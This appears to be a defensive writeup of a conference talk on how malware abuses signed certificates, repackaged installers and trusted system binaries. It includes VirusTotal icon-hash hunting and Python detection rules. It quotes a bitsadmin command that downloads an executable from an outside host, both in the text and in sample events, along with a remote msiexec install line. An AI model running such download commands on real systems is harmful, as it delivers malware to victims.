Deception at Scale: How Malware Abuses Trust
This talk analyzes how malware authors leverage legitimate infrastructure, digital certificates, and trusted software installers to evade detection and distribute malicious payloads. The research highlights the prevalence of signed malware using stolen certificates, the use of popular legitimate domains for hosting, and the embedding of malicious installers within trusted software packages. The findings provide actionable intelligence for defenders and bug bounty hunters to identify and track these deceptive techniques using VirusTotal. The presentation demonstrates specific queries and indicators of compromise to detect these threats at scale.
How Malware Authors Weaponize Trust to Bypass Modern Defenses
TLDR: Malware authors are increasingly embedding malicious payloads within legitimate software installers and using stolen digital certificates to evade detection. This research demonstrates how attackers abuse trusted domains and common system binaries to maintain persistence and execute code. Defenders, and the pentesters testing them, should prioritize monitoring for suspicious file signatures and anomalous behavior from trusted processes to identify these stealthy campaigns.
Security teams spend millions on endpoint detection and response tools, yet the most effective way to bypass these systems remains remarkably simple: stop acting like a threat and start acting like a trusted application. Recent research presented at Black Hat 2023 highlights a massive shift in how malware authors operate. Instead of building custom, easily flagged infrastructure, they are hijacking the reputation of legitimate software. By embedding malicious code into installers for popular applications like ProtonVPN or 7-Zip, attackers ensure their payloads are treated as trusted entities by both users and security software.
The Mechanics of Abused Trust
Attackers have moved beyond simple obfuscation. The current trend involves a multi-layered approach to deception. First, they target the supply chain by creating "cracked" or "repackaged" versions of legitimate software. These installers often contain the original, functional application, but they also include a hidden, malicious component.
One of the most effective techniques involves abusing code signing. When a binary is signed with a valid certificate from a reputable vendor, many security products automatically assign it a higher trust score. The research identified over 1.1 million suspicious samples that were signed with valid certificates at the time of submission. Revoking the certificate afterwards rarely undoes the damage: many products do not re-check revocation status once a file has been scanned, and a reputation score earned while the signature was valid tends to persist, so the malware often remains undetected.
Living off the Land
Once the initial payload is executed, the malware rarely attempts to download a secondary stage from a suspicious, unknown domain. Instead, it uses LOLBins—legitimate system binaries—to perform its tasks. By using tools already present on the Windows operating system, the malware avoids triggering alerts that would occur if it attempted to inject code into memory or spawn unknown processes.
For example, an attacker might use bitsadmin to download a secondary payload or msiexec to install a malicious package. These commands are common in administrative scripts, making them difficult to distinguish from normal system activity.
bitsadmin /transfer myDownloadJob /download /priority normal http://teststaff.ru/tmp.exe %SAMPLEPATH%\%username%.exe
This command, while simple, is highly effective. Because bitsadmin is a signed Microsoft binary, it is rarely blocked by default security policies. It is deprecated in favour of the PowerShell BITS cmdlets but still ships with Windows, and the transfer it queues is carried out by the BITS service rather than by the calling process, so the network connection does not even originate from the malware itself. When combined with a legitimate installer, the malicious activity blends into the noise of daily system operations. The job is recorded in the Microsoft-Windows-Bits-Client/Operational event log, which is worth collecting for exactly this reason.
Detecting Deception in Your Environment
For a pentester or a bug bounty hunter, the key to finding these threats lies in identifying the discrepancy between the expected behavior of a trusted application and its actual execution. If you are performing a red team engagement, you can test the efficacy of a client's detection capabilities by attempting to execute a signed, but malicious, binary.
The research suggests that defenders should focus on the following indicators:
- Certificate Mismatches: Monitor for binaries signed by certificates that do not match the expected vendor or have been recently revoked.
- Anomalous Parent-Child Relationships: A legitimate installer like setup.exe should not be spawning taskkill or bitsadmin to perform network operations.
- Favicon and Icon Analysis: Attackers often use visually similar icons to mimic popular applications. Using VirusTotal queries, you can hunt for files that share the same visual hash as known legitimate software but have different file hashes.
main_icon_dhash:f09ea26161a2ccf0
This query allows you to identify files that share a visual identity with a target application. If you find a file that matches this hash but has a high detection rate from antivirus engines, you have likely found a malicious repackaged installer. A matching icon hash is a lead, not a verdict: confirm it by comparing the signer and the file hash against the vendor's genuine release before acting on it.
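To make the icon-hash idea concrete, here is an added example, not code from the talk or from VirusTotal, of a difference hash (dHash) computed in pure Python over constructed greyscale "icons". It shows why a repackaged installer whose icon was copied from the vendor keeps the same icon hash while its SHA-256 changes, and why an unrelated icon lands far away. The 9x8 box-averaged downscale and row-major bit order are the textbook dHash construction; whether VirusTotal's main_icon_dhash uses exactly the same resize step is an assumption, since the page does not say.

```python
# Added example (not from the talk or VirusTotal): a pure-Python difference
# hash over small greyscale icons. Assumptions: 9x8 box-averaged downscale and
# row-major bit order (textbook dHash); VirusTotal's exact resize step is not
# documented on the page.

def box_resize(pixels, width, height):
    """Downscale a 2-D list of greyscale rows (values 0-255) to width x height
    by averaging each source block. The source must be at least width x height."""
    src_h, src_w = len(pixels), len(pixels[0])
    out = []
    for y in range(height):
        y0, y1 = y * src_h // height, (y + 1) * src_h // height
        row = []
        for x in range(width):
            x0, x1 = x * src_w // width, (x + 1) * src_w // width
            block = [pixels[j][i] for j in range(y0, y1) for i in range(x0, x1)]
            row.append(sum(block) / len(block))
        out.append(row)
    return out


def dhash(pixels, hash_size=8):
    """Difference hash: resize to (hash_size+1) x hash_size, emit one bit per
    horizontal neighbour pair (1 when the left pixel is brighter). Returns hex."""
    small = box_resize(pixels, hash_size + 1, hash_size)
    bits = 0
    for row in small:
        for x in range(hash_size):
            bits = (bits << 1) | int(row[x] > row[x + 1])
    return f"{bits:0{hash_size * hash_size // 4}x}"


def hamming(h1, h2):
    """Number of differing bits between two hex hashes of equal length."""
    return bin(int(h1, 16) ^ int(h2, 16)).count("1")


# Constructed 32x32 "icons": a gradient standing in for a vendor logo, the same
# logo with a single pixel altered (as a repackager might), and an unrelated
# checkerboard. None of these are real icons.
LOGO = [[(7 * x + 5 * y) % 256 for x in range(32)] for y in range(32)]
REPACKED_LOGO = [row[:] for row in LOGO]
REPACKED_LOGO[0][0] = 255
CHECKERBOARD = [[255 if (x // 4 + y // 4) % 2 == 0 else 0 for x in range(32)]
                for y in range(32)]

if __name__ == "__main__":
    for name, icon in (("logo", LOGO), ("repacked", REPACKED_LOGO), ("other", CHECKERBOARD)):
        print(f"{name:9s} dhash: {dhash(icon)}")
    print("logo vs repacked distance:", hamming(dhash(LOGO), dhash(REPACKED_LOGO)))
    print("logo vs other    distance:", hamming(dhash(LOGO), dhash(CHECKERBOARD)))
```

The altered pixel shifts one block average but not the brighter-than-its-neighbour relation, so the hash is identical; a perceptual hash is deliberately blind to small edits. In practice you would feed this the icon extracted from the PE resource section (converted to greyscale), then pivot in VirusTotal on the value and discard matches whose signer and file hash agree with the vendor's real release.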
The Reality of Modern Persistence
Web shells remain a primary method for maintaining persistence on compromised servers. The research uncovered a significant number of JPEG files containing embedded PHP code. These files are often uploaded to legitimate government or corporate websites that have vulnerable content management systems. By hiding the malicious code within a file that appears to be a standard image, attackers can bypass basic file-type filtering. The image itself is inert; it becomes a web shell only when the server can be made to interpret it as PHP, for example through an upload handler that preserves a .php extension, a misconfigured handler mapping, or an existing script that includes the file.
The impact of these techniques is profound. When an attacker successfully compromises a trusted domain, they gain a foothold that is difficult to remove. They can serve malicious payloads to unsuspecting users, host command-and-control infrastructure, and maintain access for months without being detected.
Defenders must move away from relying solely on file reputation. A file being "signed" or "hosted on a popular domain" is no longer a guarantee of safety. Instead, security operations must shift toward behavioral analysis. If a process is performing actions that fall outside its normal scope—such as a browser installer making unexpected network connections or a document reader spawning a command shell—it should be treated as a potential compromise. The era of trusting binaries based on their metadata is over. Start looking at what the code actually does, not just who signed it.
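As an added example of the behavioral approach argued for here, the following is not code from the talk but a small rule set that implements three of the page's indicators: the bitsadmin and msiexec download patterns from the Living off the Land section, and the anomalous parent-child relationships (an installer like setup.exe spawning bitsadmin or taskkill, a document reader spawning a command shell). It runs over constructed Sysmon-style process-creation events using Event ID 1 field names (Image, ParentImage, CommandLine). The parent and child lists, the installer name pattern and the sample events are assumptions to tune for your own environment.

```python
# Added example (not from the talk): behavioral rules over constructed
# Sysmon-style process-creation events. Parent/child lists and the installer
# name pattern are assumptions, not values from the research.
import json
import ntpath
import re

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
INSTALLER_PARENT = re.compile(r"(setup|install).*\.(exe|tmp)$", re.IGNORECASE)
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
UNEXPECTED_CHILDREN = {"bitsadmin.exe", "taskkill.exe", "cmd.exe", "powershell.exe",
                       "mshta.exe", "certutil.exe", "rundll32.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def evaluate(event):
    """Return the names of the rules a single process-creation event trips."""
    image, parent = basename(event.get("Image", "")), basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    # Rule 1: bitsadmin told to fetch from a URL (/transfer or /addfile).
    # A bare "bitsadmin /list" from an admin console does not match.
    if (image == "bitsadmin.exe" and re.search(r"/(transfer|addfile)\b", cmd, re.I)
            and URL_RE.search(cmd)):
        hits.append("bitsadmin_remote_download")
    # Rule 2: msiexec asked to install a package straight from a URL.
    if image == "msiexec.exe" and re.search(r'/(i|package)\s+"?https?://', cmd, re.I):
        hits.append("msiexec_remote_package")
    # Rule 3: an installer or document viewer spawning a LOLBin or shell.
    # msiexec is deliberately absent from the child list: setup.exe launching
    # it is normal, which is why rule 2 looks at its command line instead.
    if image in UNEXPECTED_CHILDREN and (INSTALLER_PARENT.search(parent) or parent in DOCUMENT_PARENTS):
        hits.append(f"unexpected_child:{parent}->{image}")
    return hits


def scan_jsonl(text):
    """Evaluate one JSON event per line; return [(line_no, hits)] for lines that hit."""
    results, n = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        n += 1
        hits = evaluate(json.loads(line))
        if hits:
            results.append((n, hits))
    return results


# Constructed events (not real telemetry). Event 1 mirrors the bitsadmin command
# quoted earlier on the page, launched by a repackaged installer.
SAMPLE_EVENTS = r"""
{"Image":"C:\\Windows\\System32\\bitsadmin.exe","ParentImage":"C:\\Users\\bob\\Downloads\\ProtonVPN_setup.exe","CommandLine":"bitsadmin /transfer myDownloadJob /download /priority normal http://teststaff.ru/tmp.exe C:\\Users\\Public\\bob.exe"}
{"Image":"C:\\Windows\\System32\\bitsadmin.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"bitsadmin /list /allusers"}
{"Image":"C:\\Windows\\System32\\msiexec.exe","ParentImage":"C:\\Users\\bob\\Downloads\\7zip_setup.exe","CommandLine":"msiexec /i https://cdn.example.net/helper.msi /qn"}
{"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"cmd.exe /c whoami"}
{"Image":"C:\\Program Files\\7-Zip\\7zFM.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"\"C:\\Program Files\\7-Zip\\7zFM.exe\""}
"""

if __name__ == "__main__":
    for n, hits in scan_jsonl(SAMPLE_EVENTS):
        print(f"event {n}: {', '.join(hits)}")
```

Note what the rules do not key on: none of them looks at the signer or the reputation of the parent. Event 1 would fire even if ProtonVPN_setup.exe carried a valid signature, which is the point of the closing paragraph. Expect to tune rule 3; a genuine installer that kills a running instance of the application it updates will trip the taskkill child, so treat that pairing as a triage signal rather than an automatic block.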